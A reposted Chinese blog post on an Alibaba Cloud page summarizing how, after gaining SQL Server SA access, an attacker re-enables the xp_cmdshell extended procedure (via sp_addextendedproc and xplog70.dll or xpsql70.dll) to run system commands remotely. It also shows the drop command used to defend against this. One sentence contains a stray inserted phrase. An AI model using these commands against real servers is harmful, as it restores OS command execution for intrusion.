SQL Server SA許可權總結

來源:互聯網
上載者:User
server

最近需要用到這些東西的時候,發現自己有點記不清了,這真是人老了做什麼都不行了。沒辦法,只好在自己的blog上總結一下吧。使用Sqlexec加管理員的過程這裡冰血就不涉及了。

前提需要工具:SQL Query Analyzer和SqlExec Sunx Version

第一部分:
有關去掉xp_cmdshell來保護系統的分析總結:
首Crowdsourced Security Testing道一下語句:
1.去掉xp_cmdshell擴充過程的方法是使用如下語句:
Code:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'


2.添加xp_cmdshell擴充過程的方法是使用如下語句:
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


現在看看現象:
我們在取得SA許可權後遠程用Sqlexec執行cmd命令,出現提示SQL_ERROR,那麼很可能是去掉了xp_cmdshell。

現在來看看被去掉xp_cmdshell後恢複的兩種方法:
方法一、使用SQL Query Analyzer串連對方後直接寫入,挺方便
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


方法二、使用SqlExec Sunx Version
首先在SqlExec Sunx Version的Format選項裡填上%s,在CMD選項裡輸入
Code:
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

或者對Sql2000情況下使用
Code:
sp_addextendedproc 'xp_cmdshell','xplog70.dll'


另外使用SqlExec Sunx Version來去除xp_cmdshell的方法
和加的時候選擇條件一樣,然後輸入
Code:
sp_dropextendedproc 'xp_cmdshell'

就可以了

第二部分:
假如對方已經把xplog70.dll刪除或者改了名,我們來用下面的方法繼續我們的hack任務:
當出現如下現象暗示代表很有可能是xplog70.dll刪除或者改了名。
在查詢分析器中寫入
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

提示
資料庫中已存在名為'xp_cmdshell'的對象

那麼我們如何恢複呢?
其實按照高手lcx提供的方法,我們可以通過使用查詢分析器中寫指令碼來實現。
具體指令碼原始碼請點擊串連獲得。

 



聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.